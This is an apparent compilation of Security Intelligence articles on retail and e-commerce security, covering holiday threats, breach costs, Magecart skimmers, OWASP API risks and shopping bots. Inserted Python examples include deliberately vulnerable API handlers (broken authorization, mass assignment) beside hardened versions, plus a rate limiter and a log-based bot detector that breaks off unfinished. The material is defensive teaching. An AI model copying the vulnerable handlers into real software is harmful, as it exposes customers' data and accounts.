Retail – Security Intelligence
https://securityintelligence.com
Analysis and Insight for Information Security Professionals

5 ways to improve holiday retail and wholesale cybersecurity
https://securityintelligence.com/articles/5-improvements-retail-wholesale-holiday-cybersecurity/
Fri, 16 Dec 2022 11:00:00 +0000

It’s the most wonderful time of the year for retailers and wholesalers since the holidays help boost year-end profits. The National Retail Federation (NRF) predicts 2022 holiday sales will come in 6% to 8% higher than in 2021. But rising profits that come at the cost of reduced cybersecurity can cost companies in the long run when you consider the rising size and costs of data breaches.

The risk of data breaches and other cyber crimes can make this shopping season feel pretty perilous. It makes sense to learn about the types of cyberattacks aimed at this sector, particularly at this time of year, and what retailers and wholesalers can do to protect themselves.

’Tis the season for cyber crime

Consumers started holiday shopping enthusiastically this year and have spent at record levels, despite inflation concerns. Adobe Analytics forecasts consumers will spend $209.7 billion online between Nov. 1 and Dec. 31. Hackers stand ready to steal their slice of the loot. Check Point Research found a sharp increase in fake shopping sites ahead of Black Friday sales. It also found that 17% of malicious files distributed by email in November were related to orders, deliveries and shipping, and that since the start of November, 4% of all new shopping-related websites were malicious. Fake websites and phishing scams were the prime means of duping consumers.

Wholesalers and retailers rank as threat targets

Retail and wholesale were the fifth-most targeted industries according to the X-Force Threat Intelligence Index 2022 ranking. They accounted for 7.3% of all attacks in 2021. Among those attacks, 35% were aimed at retail and 65% at wholesale. This split reveals the increased interest of threat actors in wholesale operations, perhaps due to their critical role in supply chains and the transport of goods from manufacturers to third-party resellers and even direct to consumers. The report notes that phishing was the top infection vector for the sector, with stolen credentials coming in second and vulnerability exploitation coming in third.

Below are tips for retailers and wholesalers to avoid becoming a cyber crime victim during the holiday season and all year long. Following this advice can help make your enterprise a safer shopping and selling environment.

1. Educate users and consumers

Cyber criminals never stop learning and refining ways to attack. You need to take the same approach by committing to continuous education to ensure your users and consumers stay informed about how attacks evolve. This can include annual or bi-annual training sessions for internal teams, which include real-world examples of social engineering, phishing, vishing and spoofing attacks. You may want to incorporate regular testing and assessment to ensure the training has been successful. You may also find an education campaign helpful for your consumers. Ensure they know where they can find accurate information about sales and deals. Also, help them learn signs for knowing which websites are legitimate and which are suspect.

2. Use a multilayer approach to fight phishing

There’s no one-size-fits-all approach to stopping phishing attacks. These attacks are simple to execute, and hackers work constantly to improve their approaches, making fake emails harder to detect. A multi-layer approach erects defenses to make these attacks more difficult to deploy.

  • Educate users on what to watch for. This education should include real-world examples.
  • Email software security tools can help filter out malicious messages.
  • Eventually, a phishing email will slip through. Use defenses that quickly catch malware and unusual lateral movements through your network, such as behavior-based anti-malware detection.

3. Apply a zero trust model

A zero trust framework assumes your network is always at risk from both internal and external attacks. When that belief is your starting point, it clarifies the policies and strategies used to counter threats. These tips can get you started:

  • Identify your most valuable assets. The point of zero trust is to protect what’s most valuable for your company. For retailers and wholesalers, that’s likely consumer PII.
  • Define roles and limit access. Your data and resources should be inaccessible by default. Follow the rule of least-privilege access so that only certain roles under specific circumstances can access information.
  • Verify every connection. Default to authenticating and authorizing every connection, internal or external.
  • Wall off your networks. The ability to move laterally from one network server to another is a prime culprit in data breaches. Walling off networks and preventing that lateral movement can help contain the damage if and when a breach occurs.

4. Take vulnerability management seriously

Software vulnerabilities provide fertile ground for security breaches. Applying timely patches and updates helps close some of these vulnerabilities, but they evolve so quickly that it can feel like a losing battle. These tips help refine your vulnerability management response:

  • Set up a team dedicated to vulnerability management.
  • Sign up for alerts from national agencies, like the Cybersecurity and Infrastructure Security Agency (CISA). These alerts describe the threat and offer resources and advice to mitigate damage.
  • You can also turn to sources like IBM’s X-Force Exchange, a repository of vulnerabilities and criticality levels to identify the most concerning vulnerabilities, and to X-Force Red, a specialized vulnerability scanning and management service.

5. Automate security to ease the workload of your security and IT teams

Speed matters when addressing security threats. Using automation to identify and respond to threats can help slow or even stop attacks before they escalate. Automation can outsource to machines the tasks that would take human teams much longer to accomplish. This type of outsourcing also helps relieve some of the pressure that your security and IT teams feel when threats arise.

To outsource these tasks, you can look to automation tools. For example, the IBM Security QRadar SOAR platform provides a central hub to make incident response more efficient. It also correlates security alerts to intelligence feeds to unearth malicious indicators and malware incidents. The tool also offers playbooks that help guide your team on the steps to follow during incident response.

The holiday season should be a wonderful time of year for retail and wholesale businesses. Strengthening your cybersecurity defenses helps ensure the holidays remain happy and profitable and reduces the chance of putting your users or consumers at risk.

Cost of a data breach: Retail costs, risks and prevention strategies
https://securityintelligence.com/articles/cost-data-breach-retail-costs-risks-prevention/
Wed, 31 Aug 2022 10:00:00 +0000

Whether it’s online or brick-and-mortar, every new store or website represents a new potential entry point for threat actors. With access to more personally identifiable information (PII) of customers than most industries, bad actors perceive retail as a great way to cash in on their attacks. Plus, attackers can duplicate attack methods more easily since retailers share similar cybersecurity infrastructure.

The good news for retail is that the cost of a data breach in the sector remains low compared to many industries. However, this does not mean cybersecurity shouldn’t be a high priority. For retail, intangible costs like company reputation are often more important.

What is a retail data breach?

Retail data breaches result in attackers making off with customer data: credit card numbers, names, addresses and (in the case of e-commerce data breaches) even passwords. Retail data breaches also involve attackers gaining access to company data or accounts.

The methods attackers use to breach data in retail include:

  • Skimming credit card information at the point of sale
  • Sending phishing emails to social engineer information to obtain passwords or bank account numbers
  • Sending or injecting malware that can steal or wipe data
  • Using ransomware that holds data hostage until the victim pays a fee
  • Launching a denial of service (DoS) attack, which is not a direct breach in itself but can serve as a tactic in executing one

Well-known recent retail data breaches

In June 2021, Wegmans suffered a breach due to cloud misconfiguration. Although the company did not disclose the number of exposed customers, personal data compromised included customer names, home and email addresses, phone numbers, loyalty club numbers, birthdates and passwords to online accounts.

Fashion retailer Guess faced a ransomware attack in July 2021. Attackers breached an undisclosed number of customer records. Personal data affected included driver’s license numbers and Social Security numbers. The attackers may also have been able to access other personal financial data and passport numbers.

In November, Panasonic disclosed an attack that at first appeared to involve only business partner and proprietary data. In January 2022, it announced that attackers had also accessed job candidate and intern data.

How much does a retail data breach cost?

As noted above, retail data breaches are far down the list of the most costly. According to the 2022 IBM Cost of a Data Breach Report, the average cost of a data breach in retail in 2022 is $3.28 million, a very modest increase from the $3.27 million per breach in 2021. However, retail moved up from 15th to 14th on the list of most costly data breaches per industry.

In the retail sector, data breach costs go beyond what might be lost or stolen from companies or customers.

Costs may also include:

  • Making good with customers in cash or credit and identity monitoring
  • Litigation in the event of a class-action lawsuit
  • Breach repairs and future breach prevention.

Don’t forget that for retail, damage caused by loss of consumer confidence can be very costly to a company’s good name and bottom line.

According to the report, the largest share of data breach costs in 2022 was detection and escalation, at $1.44 million. That is an increase from $1.24 million in 2021, or 16.1% growth. This category covers the activities that enable a company to detect a breach: forensic and investigative work, assessment and audit services, crisis management and communications to executives and boards.

Prevention strategies

For retail even more than in other industries, the customer is paramount. Security teams in this field need to build their strategy on a foundation of controlling which sensitive data is available, to whom and of what type, while ensuring it can be reached when needed.

Retailers must be vigilant about security across all fronts, from protecting data at the point of sale to safeguarding the servers where customer data is stored. An excellent strategy for this is adhering to good security hygiene like network segmentation, which splits networks into separate segments. For example, you’ll want to segment Internet of Things devices (more and more common in the retail sector) away from other devices or resources containing sensitive data. Segmentation also protects your network’s data from third-party vendors, who need access to specific devices but shouldn’t be able to reach anything else. The 2014 Target breach was a classic example of the importance of third-party risk management.

Another strategy retailers can use to mitigate risk is to use the latest in point of sale tools. Accept EMV chip cards and mobile wallet payments.

Finally, retailers should consider adopting modern security tools like artificial intelligence (AI) and automation and move toward the zero trust model to protect information at every level, from corporate headquarters to storefronts and their e-commerce sites.

Why? These tools and technologies are clearly working. According to the 2022 report, breaches at organizations with fully deployed security AI and automation cost $3.05 million less than breaches at those without. This 65.2% difference in average breach cost represents the largest cost savings in the study.

For retailers without a data breach prevention strategy already in place, 2022 is a great year to start.

Lessons learned by 2022 cyberattacks: X-Force Threat Intelligence Report
https://securityintelligence.com/articles/lessons-learned-top-cyberattacks-x-force/
Thu, 26 May 2022 13:00:00 +0000

Every year, the IBM Security X-Force team of cybersecurity experts mines billions of data points to reveal today’s most urgent security statistics and trends. This year’s X-Force Threat Intelligence Index 2022 digs into attack types, infection vectors, top threat actors, malware trends and industry-specific insights.

This year, a new industry took the infamous top spot: manufacturing. For the first time in over five years, finance and insurance were not the top-attacked industries in 2021, as manufacturing overtook them by a slight margin. Here’s a breakdown of the top five industries targeted and what businesses need to know about each one.

#1 Manufacturing

For the first time since 2016, manufacturing was the most attacked industry in 2021, targeted in 23.2% of the attacks addressed by X-Force.

Accounting for 23% of attacks, ransomware was the top attack type, exposing the heavy focus ransomware actors place on manufacturing. Server access attacks came in second place at 12%, which might represent some failed attack operations. Business email compromise (BEC) and data theft tied for third place, at 10% each.

BEC attacks often seek to take advantage of manufacturer relationships with suppliers, sub-suppliers and wholesale shipping. Threat actors redirect payments between partners to accounts under the BEC attackers’ control. Meanwhile, data theft efforts may focus on stealing sensitive intellectual property or holding data for ransom.

#2 Finance and insurance

Attackers hit finance and insurance companies in 22.4% of attacks remediated by X-Force in 2021. Compared to prior years, the financial industry’s attack rate has fallen. This suggests that financial companies are putting higher standards in place. In addition, financial services use hybrid cloud environments, which enable improved data visibility and management.

Server access breaches (14%) were found to be the top attack type on finance and insurance companies. This was followed by ransomware, misconfigurations and fraud, all coming in at 10%. Meanwhile, phishing was the most common infection vector for financial services, leading to 46% of attacks against this sector in 2021.

#3 Professional and business services

Professional services include IT providers, law firms, architects, accountants and consultants. Business services include office administration, HR, security services, travel assistance and landscaping. Professional and business services firms accounted for 12.7% of all attacks observed in 2021.

Ransomware was the top attack type for this sector, making up 32% of all attacks observed by X-Force. Server access attacks were the second-most common attack type (19%). A decrease in ransomware attacks in Q4 suggests that professional services firms are doing a better job at thwarting ransomware attacks. Vulnerability exploitation accounted for 50% of incidents, and phishing accounted for another 20% in this sector.

#4 Energy

The energy industry was the fourth most attacked in 2021, with 8.2% of all attacks observed. The X-Force report speculates that threat actors shifted their focus away from energy entities for a brief time for fear of retaliation after the ransomware attack on the Colonial Pipeline in May 2021. But attack rates appear to have been rising since September.

Ransomware (25%) was the most common attack type against energy organizations in 2021. This was followed by remote access trojans (RATs), denial of service and BEC, all of which tied for second place (17%). Phishing was the most common attack vector, making up around 60% of attacks against the energy sector. Vulnerability exploitation made up the other 40% of incidents.

#5 Retail and wholesale

Retail and wholesale were the fifth most targeted in X-Force’s 2022 ranking. Overall, the sector faced 7.3% of all attacks. Within the sector, retail accounted for 35% and wholesale 65% of attacks. Threat actors may have focused more on wholesale groups due to their role in supply chains.

BEC, server access, data theft and credential harvesting were the top attack types on retail and wholesale last year. Ransomware and banking trojans also accounted for a large number of attacks, followed by RATs, misconfiguration and fraud. Phishing was the top infection vector for the sector, accounting for 38% of the attacks. Stolen credentials were the second most common vector at 31%. Meanwhile, vulnerability exploitation made up another 23% and brute force 8%.

Adapt and thrive

The threat landscape is constantly changing, and each industry has its unique challenges. Overall, ransomware continues to be the top threat in most sectors. As shown by the improvement in finance and insurance, efforts to strengthen digital defenses lead to concrete results against established and emerging threats.

Magecart Attacks Continue to ‘Skim’ Software Supply Chains
https://securityintelligence.com/articles/magecart-software-supply-chain/
Fri, 21 Jan 2022 17:00:00 +0000

Did your company or e-commerce firm recently buy third-party software from a value-added reseller (VAR) or systems integrator? Did you vet the vendor code? If not, you could be at risk for a Magecart group attack.

Magecart is an association of threat actor groups who target online shopping carts, mostly from within the e-commerce platform Magento. The Magecart name is derived by combining ‘Mage’ (from Magento) with ‘cart’ (shopping cart). This type of attack is especially dangerous as it only takes one line of code to steal payment card data.

Magecart attacks can compromise a piece of third-party software from a VAR or systems integrator. Recently, these groups have been infecting a variety of supply chain processes.

Let’s take a closer look at this malicious attack vector and how it has evolved over time. Later, we’ll explore ways you can protect your business and customers from Magecart attacks.

Magecart: Just One Line of Code

Back in 2015, Magecart made global headlines with a series of high-profile attacks targeting some big names in air travel, ticketing and retail.

In the classic Magecart attack, threat actors insert a single line of malicious code that loads a JavaScript sniffer. Once that line is in place, whenever a user lands on the compromised website’s shopping cart or checkout page, the page fetches the JS sniffer, which intercepts any information entered on the page and sends it to the attackers.

This type of attack is also known as a credit card skimmer, digital skimmer, web skimmer or formjacking.

Magecart can skim anything entered into an online data form, such as card numbers, expiration dates, CVC codes, names, addresses, phone numbers, email addresses and so forth. This data can then be used for identity theft or fraud. In other cases, it ends up for sale on the darknet.

Moving to Third-Party Targets

At first, Magecart targeted specific businesses, large and small alike. More recently, attackers have pivoted to target advertising supply chains. Researchers have detected skimming scripts on thousands of websites of all kinds, from flight booking services to retail, cosmetic, health care and apparel companies.

In this version of the attack, instead of specific businesses, threat actors target vendors that supply code that enhances website functionality. For example, web-based ad software suppliers work with thousands of clients. This means the vendor spreads the infected code for the attackers without knowing about it.

Anyone relying on a third-party vendor for part of their website code is at risk. If you drop in code for analytics, you might also be inserting a Magecart payload into your website.

More recently, attackers have even used hosting services as vectors to infect client sites with Magecart. They also cloak malicious code by hiding scripts in the metadata of image files or inside otherwise legitimate CSS files. As a detection technique, some defenders even turn to online steganography decoder services in an attempt to reveal hidden code.

Magecart Supply Chain Threat

As mentioned, every third-party software vendor is a potential channel for another Magecart attack. For instance, a single vendor can provide ticketing, touring and booking services to hundreds of clients, so infected code from that one vendor could compromise any kind of media or entertainment site. Infected content could also arrive through a content delivery network (CDN). In essence, any website that conducts transactions online or collects user data could be breached by Magecart.

When Magecart first appeared in 2015, the primary target was open-source Magento e-commerce platforms. Today, the threat is more and more expansive across a wide variety of software categories. One multi-functional script was discovered to be skimming data from a whopping 57 different payment platforms.

Ant and Cockroach Skimmer

Magecart groups most often use the ant and cockroach technique. It involves the following:

  • Separate ‘loader’ and ‘skimmer’ code
  • Checks that the current URL is a targeted checkout page and that developer tools are not open
  • A “Radix” obfuscation technique that disguises the skimming code
  • Frequent slight tweaks to the malicious code to avoid detection

Magecart attacks continue to increase in scope and sophistication. E-commerce and supply chain businesses face increasing pressure to protect their websites against these threats.

Stopping Magecart Attacks

While there’s no magic bullet to prevent skimming attacks, there are some tools and strategies that can help improve and harden your security.

Zero Trust

Consider adopting a zero-trust approach with JavaScript on your sites. This begins with a policy to block access by default to any sensitive information entered in web forms and stored cookies. From there, only a select set of vetted scripts (mostly ones that you author and/or own) is allowed to access sensitive data. If malicious skimming code does infect your site, it’s less likely to access any of the sensitive information.

Third-Party Risk Management

Directed third-party risk management creates a centralized, tightly mapped structure of third-party risk hierarchy including risks, controls, locations and regulations. These models support third-party categorization based on risk, criticality and other factors. Configurable methodologies can assess and score inherent and residual third-party risks. This includes capturing detailed vendor risk data, including severity, impact, mitigating plans and other issues.

Subresource Integrity

Subresource Integrity enables browsers to verify that the resources they fetch are delivered without unexpected manipulation. It works by letting you provide a cryptographic hash that a fetched resource must match.

Subresource Integrity enables you to mitigate attack risk by ensuring that the files your web application or web document fetches (such as from a CDN) have arrived without a third-party having injected any additional content or changes into those files.

Content Security Policy

Content Security Policy is an added layer of security that helps to detect and mitigate certain types of attacks, including cross-site scripting and data injection attacks. These attacks are used for everything from data theft to site defacement to malware distribution.

Protect Your Business & Customers

The worst thing you can do is pretend that Magecart attacks don’t exist, or think you can’t be affected. If you use third-party software to collect data on your site, it pays to look into protection efforts against Magecart.

Omnichannel E-commerce Growth Increases API Security Risk
https://securityintelligence.com/articles/omnichannel-growth-increases-api-risk/
Mon, 10 Jan 2022 14:00:00 +0000

Today, a lot of the digital innovation we see is largely thanks to the application programming interface (API). Without APIs, rapid development would be nearly impossible. After all, the API is the link between computers, software and computer programs. But wherever there’s a link, a potential data security weakness exists.

Essential for modern mobile, SaaS and web applications, APIs are nearly ubiquitous across front office, back office and internal applications. By nature, however, APIs expose application logic and sensitive data such as Personally Identifiable Information (PII). This makes APIs attractive targets for attackers.

Meanwhile, due to market pressures and customer demand, omnichannel e-commerce has ramped up considerably. And so has API security risk along with it.

APIs and Omnichannel Grow Together

The number of Postman Collections (API folders for developers to group API requests together) skyrocketed from less than half a million to nearly 35 million between 2016 and 2020. There’s no doubt that API use will continue to increase in the future.

Three major shifts generated this massive growth in API use:

  • Multi-device use: As people connect from many devices at once, APIs are needed to power these connections.
  • Microservices: The move away from a monolithic architecture to more flexible microservice-based development requires APIs.
  • Move to the cloud: Driven by the advantage of rapid provisioning, the shift from on-premises to the cloud means APIs are built and deployed faster than ever.

Meanwhile, all of this API activity benefited (and was driven by) the rise of omnichannel e-commerce.

Omnichannel retail is a multichannel approach to sales that creates a seamless customer experience. This means whether the customer shops from a mobile device, PC or brick-and-mortar store, the experience is unified across all channels. And omnichannel development would be impossible without APIs.

API-led connectivity overcomes obstacles that retailers face gathering data from disparate systems to then consolidate the data into monolithic data warehouses. Since each individual system updates separately, information may be out-of-date by the time it hits the database.

APIs enable retailers to build an application network that serves as a connectivity layer for data stores and assets in the cloud, on-premises or in hybrid environments. As a result, mobile applications, websites, IoT devices, CRM and ERP systems (order management, point of sale, inventory management and warehouse management) can all work as one coherent system that connects and shares data in real-time.

Increase in API Security Breaches

The downside to this rapid growth and development in e-commerce has been a concerning rise in API security attacks. Here, threat actors have executed numerous high-profile breaches against public-facing applications. For example, developers use APIs to connect resources like web registration forms to various backend systems. This flexibility, however, also creates an entrance for automated attacks.

Some investigations reveal the average web application or API has nearly 27 serious vulnerabilities. Organizations can have hundreds or even tens of thousands of applications. It’s no wonder then that some of the biggest brand names have been subject to API-related security breaches.

The real-world damage includes exfiltration of personal data of high profile personalities, food supply chain vulnerabilities and the theft of tens of millions of individual private records.

OWASP API Security Project

The growing risk from API and application vulnerabilities prompted OWASP to establish its top 10 list of API-related attacks. Here’s a high-level summary:

  • API 1 – Broken Object Level Authorization: APIs tend to expose endpoints that handle object identifiers, creating a wide attack surface for object-level access control issues.
  • API 2 – Broken User Authentication: Incorrectly implemented authentication allows attackers to compromise authentication tokens or steal user IDs.
  • API 3 – Excessive Data Exposure: With generic implementations, developers may expose all object properties without considering individual sensitivity.
  • API 4 – Lack of Resources & Rate Limiting: APIs frequently do not place restrictions on the size or number of resources that can be requested by the client/user. This may facilitate DDoS or brute force attacks.
  • API 5 – Broken Function Level Authorization: Complex access and administration control policies can lead to authorization flaws. This exposes user resources and/or other administrative functions.
  • API 6 – Mass Assignment: Attaching client-provided data (e.g., JSON) to data models, without proper allow-lists allows attackers to modify object properties.
  • API 7 – Security Misconfiguration: Arises from unsecured default configurations, incomplete or ad-hoc configurations, open cloud storage, misconfigured HTTP headers, unnecessary HTTP methods, permissive Cross-Origin resource sharing (CORS) and verbose error messages containing sensitive information.
  • API 8 – Injection: Injection flaws (SQL, NoSQL, Command Injection, etc.) occur when untrusted data is sent to an interpreter as part of a command or query. Malicious data can trick the interpreter into executing unauthorized commands.
  • API 9 – Improper Assets Management: APIs can expose many endpoints making proper and updated documentation even more critical. Proper hosts and deployed API versions inventory play an important role to mitigate threats.
  • API 10 – Insufficient Logging & Monitoring: Insufficient logging and monitoring, coupled with missing or ineffective integration with incident response, allows attackers to further attack systems, maintain persistence, enter other systems and extract or destroy data.
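To make API1, API3 and API6 concrete, here is an added example (not code from the original article or from OWASP): a miniature order-lookup and profile-update API in which each vulnerable handler sits next to its hardened form. The in-memory tables, user names, order IDs and the `(status, body)` return convention are constructed for illustration.

```python
# Added example (not from the original article): three OWASP API Security
# Top 10 (2019) flaws, each shown as the vulnerable handler next to its
# hardened form. Store contents, user names and order ids are constructed.

# Constructed in-memory tables standing in for the order and customer databases.
ORDERS = {
    1001: {"id": 1001, "owner": "alice", "total": 42.50, "card_last4": "4242"},
    1002: {"id": 1002, "owner": "bob", "total": 199.99, "card_last4": "1881"},
}
USERS = {
    "alice": {"username": "alice", "email": "alice@example.com", "is_admin": False},
    "carol": {"username": "carol", "email": "carol@example.com", "is_admin": False},
}

# Handlers return (http_status, json_body) the way a framework route would.

# API1 Broken Object Level Authorization: the id comes straight from the URL.
def get_order_vulnerable(caller, order_id):
    order = ORDERS.get(order_id)
    if order is None:
        return 404, {"error": "not found"}
    # The session proves the caller is logged in, but nothing checks that the
    # caller owns this object, so alice reads bob's order by incrementing the id.
    return 200, order

def get_order_hardened(caller, order_id):
    order = ORDERS.get(order_id)
    # Authorize against the object, not just the session. Answer 404 for both
    # "missing" and "not yours" so the endpoint does not confirm which ids exist.
    if order is None or order["owner"] != caller:
        return 404, {"error": "not found"}
    # API3 Excessive Data Exposure: serialize an explicit response schema instead
    # of dumping the whole row; the card suffix never leaves the server.
    return 200, {"id": order["id"], "total": order["total"]}

# API6 Mass Assignment: binding the request body straight onto the model.
def update_profile_vulnerable(username, payload):
    USERS[username].update(payload)   # a body of {"is_admin": true} is accepted
    return 200, USERS[username]

PROFILE_WRITABLE = {"email"}   # explicit allow-list of client-writable fields

def update_profile_hardened(username, payload):
    unexpected = set(payload) - PROFILE_WRITABLE
    if unexpected:
        # Reject rather than silently drop, so the attempt shows up in logs.
        return 400, {"error": "fields not allowed", "fields": sorted(unexpected)}
    USERS[username].update({k: payload[k] for k in PROFILE_WRITABLE if k in payload})
    return 200, USERS[username]

if __name__ == "__main__":
    print(get_order_vulnerable("alice", 1002))    # bob's full row, card suffix included
    print(get_order_hardened("alice", 1002))      # (404, {'error': 'not found'})
    print(update_profile_hardened("alice", {"email": "a@example.com", "is_admin": True}))
    print(update_profile_vulnerable("carol", {"is_admin": True}))   # carol is now admin
```

The same pattern applies to any endpoint that takes an identifier: look the object up, compare its owner (or an ACL) against the authenticated principal, and build the response from a schema rather than from the raw record.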

API Vulnerability Assessment & Mitigation

Given the risk and high stakes involved, how can you strengthen your API threat management strategy? Here are some best practices:

Keep an API Inventory

It is important to know where your APIs are, including older versions and APIs running in non-production environments, which are easily forgotten. API security improves when you document which endpoints each API host exposes, which endpoints are public (require no authentication) and which can be reached from the internet.

Practice Secure Coding

Encourage your developers to follow secure coding practices, since most API vulnerabilities originate in the code itself. Build security in during the development phase, before code reaches production, rather than trying to bolt it on afterwards.

Implement OAuth

Authentication and authorization are the core of API access control. OAuth 2.0 is a token-based authorization framework that lets a third-party service access user data without ever seeing the user's credentials. Note that OAuth itself handles delegated authorization; "sign in with Google or Facebook" layers OpenID Connect on top of it for authentication, and any token your API accepts as proof of identity must be validated accordingly (signature, issuer, audience and expiry).

Rate Limiting & Throttling

To defend against DDoS attacks, brute force and credential stuffing, as well as ordinary traffic spikes, place limits on how often each client can call an API. Rate throttling smooths out traffic by balancing access against availability, and it is cheap insurance against OWASP API4 (lack of resources and rate limiting).
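As an added illustration (this is example code, not from the original article or any gateway product), the following token bucket limiter applies two budgets to a login endpoint, one per source IP and one per target account. The capacities, refill rates, IP addresses, account names and the simulated clock are constructed; a deployment with several API instances would keep the buckets in a shared store such as Redis rather than in process memory.

```python
# Added example (not from the original article): token bucket rate limiting
# applied to a login endpoint with two budgets, one per source IP and one per
# target account. Capacities, refill rates, addresses, account names and the
# simulated clock are constructed for illustration.
import time

class TokenBucket:
    """Each key holds up to `capacity` tokens, refilled continuously at `refill_per_second`."""

    def __init__(self, capacity, refill_per_second, clock=time.monotonic):
        self.capacity = float(capacity)
        self.rate = float(refill_per_second)
        self.clock = clock           # injectable so tests can drive time
        self._buckets = {}           # key -> [tokens, last_update]

    def allow(self, key, cost=1.0):
        """Spend `cost` tokens for `key` and return True, or False if the budget is empty."""
        now = self.clock()
        tokens, last = self._buckets.get(key, (self.capacity, now))
        # Refill in proportion to elapsed time, never above capacity.
        tokens = min(self.capacity, tokens + (now - last) * self.rate)
        if tokens >= cost:
            self._buckets[key] = [tokens - cost, now]
            return True
        self._buckets[key] = [tokens, now]   # keep the refill, deny the request
        return False

class LoginLimiter:
    """Per-IP bucket blunts one noisy client; per-account bucket catches a
    stuffing run spread over many IPs to stay under the per-IP limit."""

    def __init__(self, clock=time.monotonic):
        self.by_ip = TokenBucket(capacity=5, refill_per_second=1.0, clock=clock)
        self.by_account = TokenBucket(capacity=10, refill_per_second=0.5, clock=clock)

    def allow(self, client_ip, username):
        if not self.by_ip.allow(client_ip):
            return False
        # An IP token is spent even if the account check then denies; that is
        # acceptable, since the client being denied is the one paying for it.
        return self.by_account.allow(username.lower())

class FakeClock:
    """Constructed stand-in for time.monotonic so the demo is deterministic."""
    def __init__(self):
        self.now = 0.0
    def __call__(self):
        return self.now

def simulate_stuffing_run():
    clock = FakeClock()
    limiter = LoginLimiter(clock=clock)
    # 20 attempts on one account from a single IP: the IP budget (5) stops it.
    single_ip = sum(limiter.allow("203.0.113.7", "alice") for _ in range(20))
    # The same account hit from 8 fresh IPs, one attempt each: every IP bucket is
    # full, so only the account budget (10, of which 5 are spent) stops it.
    distributed = sum(limiter.allow(f"198.51.100.{i}", "alice") for i in range(1, 9))
    # Three seconds later the first IP tries again: its bucket has refilled 3
    # tokens but the account bucket only 1.5, so a single attempt gets through.
    clock.now += 3.0
    later = sum(limiter.allow("203.0.113.7", "alice") for _ in range(20))
    return {"single_ip_allowed": single_ip, "distributed_allowed": distributed,
            "after_3s_allowed": later}

if __name__ == "__main__":
    print(simulate_stuffing_run())   # {'single_ip_allowed': 5, 'distributed_allowed': 5, 'after_3s_allowed': 1}
```

Keying the second bucket on the account rather than the IP is what defeats the distributed case: attackers rotate through proxy pools precisely so that no single address trips a per-IP limit.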

Use an API Gateway

An API gateway is a central point of enforcement for API traffic. A solid API gateway allows you to authenticate traffic, control API use and analyze API activity.

Use a Service Mesh

Service mesh technology enables API management and control by routing requests from one service to the next. A service mesh ensures that proper authentication, access control and other security measures work together for improved API security.

A service mesh becomes especially important as the use of microservices increases. As the number of services grows, the number of possible service-to-service communication paths grows roughly with the square of that number. A service mesh provides a unified way to configure those paths by expressing communication policy in one place.

A service mesh instruments the services and orchestrates communications traffic according to a predetermined configuration. Instead of configuring a running container, or writing code to do so, an administrator can provide configuration to the service mesh and have it complete that work.

Adopt Zero Trust

As a wider security philosophy, zero trust treats every request as untrusted until it is verified, regardless of where on the network it originates. It requires verification and authorization for every device, every application and every user, for every resource they access.

E-commerce Needs Secure APIs

For competitive brands, the omnichannel experience will continue to grow in diversity and scope, and the number of APIs will scale with it. Adopting a proactive API security stance now is what keeps your customers, business and assets safe.

The post Omnichannel E-commerce Growth Increases API Security Risk appeared first on Security Intelligence.

How Shopping Bots Can Compromise Retail Cybersecurity https://securityintelligence.com/posts/shopping-bots-compromise-retail-cybersecurity/ Thu, 28 Oct 2021 16:00:00 +0000 https://securityintelligence.com/?p=432301

Online shopping bots are not new to the e-commerce world. Stores use bots to offer better customer service, but malicious bots can cause major harm to a business. These pose cybersecurity risks to e-commerce retailers and consumers alike.

Some customers use shopping bots to execute automated tasks based on a set of instructions, such as log onto website -> look for specific product -> add product to cart -> check out. Almost every shopping bot gives its operator an unfair advantage. For example, a user who wanted to wait manually for a restock of sought-after items, such as tickets to a popular sporting event or collectible trading cards, would have to sit at their computer all day refreshing the browser by hand.

A shopping bot does that work for them. The operator programs it to poll a given website for a specific string, such as an in-stock label; when the string appears, the bot adds the product to the cart and checks out or, in some cases, simply notifies an email address. When several bots run correctly and in parallel, the sought-after product usually sells out within moments.

How Shopping Bots Can Pose Cybersecurity Risks

The general impression of a shopping bot is that it makes sales. So, what could the problem be with shopping bots?

While good bots are welcome, some bots can be malicious, especially if they are in the wrong hands. One survey showed that businesses have lost more than $100,000 in revenue from a single bot attack.

E-commerce sites being attacked by bad shopping bots are not new. An Imperva report presented the following statistics:

  • Bots comprise 30.8% of traffic to e-commerce websites
  • Of all the traffic to e-commerce sites, 17.7% comes from bad bots
  • Some 23.5% of these bad bots qualify as sophisticated bots.

So, how can you tell a good bot from a bad one? Some types can pose more business and cybersecurity risks to online retailers and customers than others.

Credential Stuffing

Credential stuffing bots replay username and password pairs leaked in earlier breaches, scraped from the internet or bought on the dark web, against a retailer's login endpoint, relying on customers who reuse passwords across sites. Each successful login hands the operator a real customer account, along with the email address, stored payment details and other information behind it, which in turn fuels phishing, business email compromise and malware campaigns. These attacks affect the confidentiality, integrity and availability of data in the retailer's systems and can damage the firm's reputation.

Inventory Denial

Sometimes it becomes virtually impossible to buy a product online because it shows as sold out. This can be the work of inventory denial bots. They mimic human traffic and then add items to shopping carts in large volumes; because many platforms reserve stock for items sitting in a cart, the system reports the inventory as sold out and customers complain about the brand on social media. The actors behind these bots do not buy the items right away. Instead, they list them for sale elsewhere at a higher price and only complete the held checkout once a buyer has paid, pocketing the difference.

Scalping Bots

Scalping bots search the internet for limited-availability products, which could be out of stock when users look for them. These bots automatically add the items to the cart the moment they become available, autofill the purchase forms and perform checkout in a short time so that the real customers who are waiting for the items can’t purchase them. Besides causing financial loss to the business, scalping bots rob it of the chance to know who its real customers are. These bots prevent the business from cross-selling products and engaging with customers to promote other merchandise.

Scraper Bots

Scraper bots crawl product pages to harvest catalog, pricing and stock data and to probe for weaknesses, and they often call the retailer's application programming interfaces directly to place orders rather than navigating the site as a human would. At volume they behave like inventory denial bots, causing sell-outs or even outages. Competitors and fraudsters then use the scraped data to undercut genuine retailers' prices.
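The three bot types above leave distinct traces in ordinary web server logs. As an added example (not code from the original article), the following script parses constructed access log lines in the common "combined" format and tags source IPs that show a run of failed logins, a pile of cart additions with no checkout, or rapid product API reads from a non-browser client. The log lines, IP addresses and thresholds are constructed; a production job would also window these counts by time and would not trust the User-Agent string, which bots routinely spoof.

```python
# Added example (not from the original article): three bot signatures from the
# article, credential stuffing, inventory denial and scraping, picked out of
# web server access logs. Log lines, addresses and thresholds are constructed.
import re
from collections import defaultdict

# Apache/nginx "combined" format:
# ip ident user [ts] "METHOD path proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

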